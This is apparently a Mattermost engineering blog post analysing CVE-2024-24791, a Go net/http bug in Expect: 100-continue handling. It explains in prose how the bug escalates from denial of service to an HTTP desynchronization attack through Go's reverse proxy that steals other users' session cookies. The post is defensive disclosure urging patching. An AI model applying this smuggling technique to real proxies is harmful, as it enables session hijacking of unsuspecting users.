A DoS bug that’s worse than it seems

November 5, 2024

Engineering

At Mattermost, we’re heavy users of the Go programming language and its extensive standard library, which is why we also care deeply about the security of the Go ecosystem.

In recent weeks, we’ve taken some time to thoroughly analyze the contents of some of the security advisories published earlier this year by the Go team.

This blog post focuses on one such advisory in particular, CVE-2024-24791, and its practical security impact. Mattermost products are not affected by any part of the issue described here, and no action is required from customers.

Go’s net/http and improper 100-continue handling

The advisory in question, published in July 2024, is described on the golang-announce mailing list as follows:

net/http: denial of service due to improper 100-continue handling

The net/http HTTP/1.1 client mishandled the case where a server responds to a request with an "Expect: 100-continue" header with a non-informational (200 or higher) status. This mishandling could leave a client connection in an invalid state, where the next request sent on the connection will fail.

A fix for this issue is available in Go versions 1.22.5 and 1.21.12.

The advisory describes a bug related to the Expect HTTP request header and the 100 Continue response status, or lack thereof. But what is this protocol feature? When would you use it? And how does a bug in it impact your average application?

A brief introduction to HTTP 100 Continue

Consider a server that allows you to upload images to it using HTTP. At the protocol level, the uploading would probably happen using an exchange such as the following:

Client → Server

POST /images HTTP/1.1
Host: images.example.com
Content-Type: image/png
Content-Length: 2132506
.PNG........IHDR. (~2 megabytes of image data)

Client ← Server

HTTP/1.1 200 OK

With the request, a client announces the type and size of the image being sent and tells the server what to do with it, then starts uploading the raw data. In this case, the image is just over 2 megabytes in size, and it will probably be a few hundred milliseconds before the server receives the headers and can start dealing with the incoming data. After the upload, the server responds with 200 OK, indicating success.

But what if the server only allows a maximum file size of 2 megabytes? By the time it receives the headers and interprets them, the client might have already sent most of the file! The server can still just ignore what’s being sent and close the connection, but bandwidth is wasted.

This is the problem that the 100 Continue response status solves. Instead of immediately starting to send the file, the client can include an Expect: 100-continue header in the initial request. This signals the server that the client wants it to confirm it actually can receive what’s about to be sent. When the client then receives a response with the status 100 Continue, it knows the server has seen the provisional metadata and still wants the actual content. A full exchange might look like the following:

Client → Server

POST /images HTTP/1.1
Host: images.example.com
Content-Type: image/png
Content-Length: 2132506
Expect: 100-continue

Client ← Server

HTTP/1.1 100 Continue

Client → Server

.PNG........IHDR. (~2 megabytes of image data)

Client ← Server

HTTP/1.1 100 OK

If the server deems the request too large, instead of 100 Continue, it can respond with an error indicating the reason and close the connection early.

Edge cases with Expect headers

When a server receives an HTTP request with an Expect: 100-continue header, it can behave as described above, but it also has other options: It can simply ignore the header and behave as if it wasn’t present at all, in which case the client should still eventually send the request body. Or it can respond to the request with a final status based on the headers alone, without waiting for the request body, and leave the TCP connection active for additional requests.

The latter is the problematic case in CVE-2024-24791, as can be seen from the advisory. According to it, “mishandling could leave a client connection in an invalid state, where the next request sent on the connection will fail.” How does this happen? Let’s look at the corresponding Git commit message:

When receiving a non-1xx response to an "Expect: 100-continue" request, send the request body if the connection isn't being closed after processing the response. In other words, if either the requestor response contains a "Connection: close" header, then skip sending the request body (because the connection will not be used for further requests), but otherwise send it.


Correct a comment on the server-side Expect: 100-continue handling that implied sending the request body is optional. It isn't.

The HTTP/1.1 client prior to Go 1.22.5 and 1.21.12 assumed that if a server responds to an Expect: 100-continue request with a final status code, it doesn’t need the request body, and the client can just not send it. But while the server might not need the request contents, omitting the body has other consequences: it desynchronizes the connection. In our image example, the server expects a 2132506-byte file even if just to discard it, and if instead of the file the connection is reused for another request, the new request gets interpreted as file contents. This is exactly the behavior described in the advisory: “next request sent on the connection will fail.”

Denial of Service or deeper impact?

The incorrect behavior in net/http affects standalone HTTP/1.1 clients, but it may not be immediately obvious how it could be exploited by an attacker. The advisory goes on to describe one such case within the standard library:

An attacker sending a request to a net/http/httputil.ReverseProxy proxy can exploit this mishandling to cause a denial of service by sending "Expect: 100-continue" requests which elicit a non-informational response from the backend. Each such request leaves the proxy with an invalid connection, and causes one subsequent request using that connection to fail.

In simpler terms: You have a Go-based frontend proxy server and an arbitrary backend it connects to. (1) An attacker sends an Expect: 100-continue request to the frontend, which forwards the request to the backend. (2) The backend responds with something other than a 100 Continue response, leaving the connection in a bad state. (3) When an unsuspecting user then issues a request to the frontend, the bad connection gets reused, the request misinterpreted, and the user left without a response.

An attacker capable of “sending Expect: 100-continue requests which elicit a non-informational response from the backend” may sound like a rare occurrence, or even a bug on the backend server’s part, but that’s not the case. Nginx, for example, in its default configuration, responds to unrecognized HTTP request methods with a 405 Not Allowed even when an Expect header is present.

Using the non-standard verb HACK to coerce an nginx backend, the full protocol-level attack flow against our image service example becomes something like this:

Why does the connection time out? Because the backend server is expecting a 2132506-byte request body, but instead only gets a short GET request in its place. It’s left waiting for the rest of the bytes.

The DoS impact is clear, but not particularly dramatic. A client can just retry and get their response the next time. There are certainly worse things that can be done with this type of an issue, however.

An attack class: HTTP desynchronization

If you’ve been following web security research in recent years, you may have already guessed it: CVE-2024-24791 is an example of a vulnerability that can be used in HTTP desynchronization attacks. First described by James Kettle in 2019 and building on an older technique called HTTP request smuggling, the core idea is simple: get a persistent HTTP connection between a frontend proxy and a backend server to go out of sync, and you can then manipulate the interpretations of HTTP requests of other users accessing the backend server through the proxy.

Turning our DoS into a more sophisticated HTTP desynchronization attack is even more simple: just set the Content-Length value in the original request to something more interesting and line things up nicely.

Below we have another example of an exchange with our image service:

Although the attack is technically simple, there are a lot of moving parts. So let’s go through the example step-by step.

(1) The attack starts with the request HACK /images, used to “elicit a non-informational response from the backend.” (2) Desynchronization happens, as the backend responds immediately with a final status and the frontend omits sending any request body.

(3) Next, the attacker starts manipulating the connection state by sending a request whose body consists of two other requests. First in the body is a GET request whose only job is to ensure that (4) the backend responds to this combination of requests and the frontend-backend connection remains alive. Second is a POST request with a sufficiently large Content-Length header value, but no request body. This is a request to upload an image using the attacker’s credentials.

After (3) and (4), the connection is left in a state where the backend expects a body for a POST request, but the frontend expects a new request. (5) When an unsuspecting user then issues a new POST request to the frontend, the frontend-backend connection previously manipulated by the attacker is reused and the backend interprets the request headers as part of the attacker’s request body. The user’s session cookies are uploaded as the attacker’s image file contents, and, finally, (6) the user sees a response intended for the attacker.

This specific attack allows stealing session cookies from other users, but other variants of the attack may allow a wide range of impacts from stealing other types of secrets to injecting malicious responses, and indeed also denial of service.

Takeaways for defenders

Writing good security advisories is hard, and the Go security team does an exceptionally good job at it. Still, some issues are more complex than they seem on the surface, and even the experts writing the advisories may not be aware of the full impact of every issue — and how would they be? Understanding impact requires understanding use cases, and something like Go’s standard library has such a wide range of uses that it would be impossible to account for all of them.

Mistakes also happen. In the case of CVE-2024-24791, the proxy implementation within Go’s own standard library is impacted in a way far worse than what’s described in the advisory. The same fix still addresses the incorrect behavior, so as a downstream user you should be fine as long as you take in all security fixes as they come, regardless of advisory content.

This, however, is where the key takeaway lies: incorrect behavior in software is always dangerous, even if all the specific ways of exploiting the incorrect behavior haven’t been identified. Keeping up with security patches, and indeed all bug fixes, is critical when dealing with complex software.

To keep up with security updates in Mattermost products, sign up for the Security Bulletin. For more information on Mattermost’s security program, visit the Mattermost Trust Center.

Go’s net/http and improper 100-continue handling

A brief introduction to HTTP 100 Continue

Edge cases with Expect headers

Denial of Service or deeper impact?

An attack class: HTTP desynchronization

Takeaways for defenders

Read More Engineering Articles

Open source news, right in your inbox

Thanks for subscribing!